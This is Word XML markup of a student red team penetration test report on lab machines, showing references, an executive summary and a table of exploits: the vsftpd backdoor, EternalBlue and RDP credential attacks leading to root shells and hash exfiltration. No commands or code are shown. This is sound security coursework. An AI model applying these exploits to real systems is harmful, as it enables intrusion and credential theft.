    <w:p w14:paraId="522604F6" w14:textId="6EE00C20" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[19] Security Journal UK, 'M&amp;S Cyber Attack – Everything We Know,' Security Journal UK, 10 Jun. 2025. [Online]. Available: https://securityjournaluk.com/m-and-s-cyber-attack/ [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17994522" w14:textId="243E1C11" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[20] Wikipedia, 'Scattered Spider,' Wikipedia: The Free Encyclopedia, last revised Mar. 2026. [Online]. Available: https://en.wikipedia.org/wiki/Scattered_Spider [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFDF52D" w14:textId="7DC77623" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[21] Daily Security Review, 'Co-Op Reports $107 Million Loss After Scattered Spider Cyberattack,' Daily Security Review, 30 Sep. 2025. [Online]. Available: https://dailysecurityreview.com/cyber-security/co-op-reports-107-million-loss-after-scattered-spider-cyberattack/ [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B3B8A8" w14:textId="680C253B" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[22] Push Security, 'How Scattered Spider TTPs Are Evolving in 2025,' Push Security Research Blog, 13 Nov. 2025. [Online]. Available: https://pushsecurity.com/blog/scattered-spider-ttp-evolution-in-2025 [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BFE1DF" w14:textId="34FD46D7" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[23] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Infosecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Europe, 'How to Defend Against IT Helpdesk Social Engineering Attacks,' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Infosecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Europe Blog, 26 Jan. 2026. [Online]. Available: https://www.infosecurityeurope.com/en-gb/blog/threat-vectors/defend-against-it-helpdesk-attacks.html [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7348DD82" w14:textId="739369FD" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[24] Computer Weekly, 'Scattered Spider Retail Attacks Spreading to US, Says Google,' Computer Weekly, May 2025. [Online]. Available: https://www.computerweekly.com/news/366623999 [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D66B897" w14:textId="7955FE7A" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[25] IT Pro, 'Scattered Spider Evolved Massively in 2025 – Here's What to Expect in 2026,' IT Pro, 14 Jan. 2026. [Online]. Available: https://www.itpro.com/security/cyber-attacks/scattered-spider-evolved-massively-heres-what-to-expect [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C45623" w14:textId="731079FD" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[26] CrowdStrike, 'CrowdStrike Services Observes SCATTERED SPIDER Escalate Attacks Across Industries,' CrowdStrike Counter Adversary Operations Blog, 2 Jul. 2025. [Online]. Available: https://www.crowdstrike.com/blog [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F298264" w14:textId="375CCB16" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[27] National Cyber Security Centre (NCSC), NCSC Annual Review 2025, London: HMSO, Oct. 2025. [Online]. Available: https://www.ncsc.gov.uk/files/ncsc-annual-review-2025.pdf [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167BEB9B" w14:textId="5A24DFDC" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[28] NCC Group, 'Annual Cyber Threat Intelligence 2025,' NCC Group Newsroom, Mar. 2026. [Online]. Available: https://www.nccgroup.com/newsroom/ncc-group-annual-cyber-threat-intelligence-2025/ [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DE9E9C" w14:textId="6BD7B1A9" w:rsidR="00196B7E" w:rsidRPr="00C668B5" w:rsidRDefault="00196B7E" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6936F" w14:textId="77777777" w:rsidR="00EA4F2C" w:rsidRPr="00C668B5" w:rsidRDefault="00EA4F2C" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AAE4E62" w14:textId="77777777" w:rsidR="00EA4F2C" w:rsidRPr="00C668B5" w:rsidRDefault="00EA4F2C" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3204DFC5" w14:textId="77777777" w:rsidR="00EA4F2C" w:rsidRPr="00C668B5" w:rsidRDefault="00EA4F2C" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C8F92E" w14:textId="77777777" w:rsidR="00EA4F2C" w:rsidRPr="00C668B5" w:rsidRDefault="00EA4F2C" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A098243" w14:textId="77777777" w:rsidR="00EA4F2C" w:rsidRPr="00C668B5" w:rsidRDefault="00EA4F2C" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="303153E8" w14:textId="77777777" w:rsidR="00EA4F2C" w:rsidRPr="00C668B5" w:rsidRDefault="00EA4F2C" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39FB5B2E" w14:textId="77777777" w:rsidR="00EA4F2C" w:rsidRPr="00C668B5" w:rsidRDefault="00EA4F2C" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65FC7E51" w14:textId="1DFD0647" w:rsidR="00196B7E" w:rsidRPr="00C668B5" w:rsidRDefault="00196B7E" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Coursework </w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Task 2 - RED TEAM PENETRATION TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692C5D19" w14:textId="77777777" w:rsidR="00196B7E" w:rsidRPr="00C668B5" w:rsidRDefault="00196B7E" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17833ADB" w14:textId="1F97CF6B" w:rsidR="00196B7E" w:rsidRPr="00C668B5" w:rsidRDefault="00196B7E" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>ABCD Ltd — Full Threat Emulation Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1173987F" w14:textId="77777777" w:rsidR="00196B7E" w:rsidRPr="00C668B5" w:rsidRDefault="00196B7E" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="69822050" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C42FCAD" w14:textId="77777777" w:rsidR="00FB20AD" w:rsidRPr="00C668B5" w:rsidRDefault="00FB20AD" w:rsidP="00FB20AD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>This report is a detailed technical description of a black-box red team engagement with an isolated virtualized laboratory environment simulating the corporate infrastructure of the ABCD Ltd the UK based retail and corporate services organisation. This engagement was conducted in strict adherence to an agreed-upon Rules of Engagement (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>RoE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>) tool and a semblance Threat Emulation Plan that was directly mapped to the MITRE ATT&amp;CK Enterprise framework v. 14. [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAFD31C" w14:textId="30E48557" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00FB20AD" w:rsidP="00FB20AD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Three distinct virtual machines constituted the target attack surface: a Metasploitable 2 Linux host (192.168.174.130), a Windows Server 2019 instance (192.168.174.135), and a Windows 10 endpoint (192.168.174.136). Using the combination of three independent exploits, one at a time, that has been applied in the adversary emulation campaign meant that all three targeted systems were completely compromised, each exploiting a unique vulnerability category in the various services and operating system platforms. [2]</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable1Light"/>
        <w:tblW w:w="9351" w:type="dxa"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="500"/>
        <w:gridCol w:w="1905"/>
        <w:gridCol w:w="2693"/>
        <w:gridCol w:w="4253"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="675ABF29" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6742A020"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1905" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0205EC5B"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Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="384914C8"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Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66AF1F90"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Business Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="58A2598F" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F647EA8"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A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1905" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D5BC90C"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Metasploitable 192.168.174.130</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="753CBF47"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vsftpd 2.3.4 Backdoor CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3682F29E"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Unauthenticated root shell; credential database exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="4D23000B" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6752ABB2"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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1905" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B18A187" w14:textId="77777777" w:rsidR="00453791" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Windows Server 2019</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6991C951" w14:textId="0AF9A4C4"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192.168.174.135</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18E519B8"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 xml:space="preserve">MS17-010 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>EternalBlue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> CVE-2017-0144</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="281873E6"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SYSTEM-level domain server compromise; NTLM hash exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="5C99A5C9" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52C57665"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C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1905" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58FF97E9" w14:textId="77777777" w:rsidR="00453791" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Windows 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C5BD6B5" w14:textId="60739DE9"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192.168.174.136</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A48CBAC"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MS17-010 / RDP Credential Attack T1110 / T1190</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05BA714F"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Full endpoint compromise; administrator access demonstrated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D79F1CE" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A3E20E3"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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C806F04" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Virtualized Laboratory Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360CEC6C" w14:textId="093F4A62" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00FB20AD" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Virtual machines of VMware Workstation were used to provide the laboratory infrastructure with all of its constituent virtual machines running on an isolated host-only network segment (192.168.174.0/24). It was monitored by blocking egress at the hypervisor using the total elimination of NAT and bridged network adapters, so as to guarantee full operation isolation inside the own infrastructure and exclude any unintended effects on existing running infrastructure [3].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D6B9C3" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00AB6328">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5189AF33" wp14:editId="6990B7CC">
            <wp:extent cx="4678587" cy="1865561"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1905"/>
            <wp:docPr id="126254489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735658" cy="1888318"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
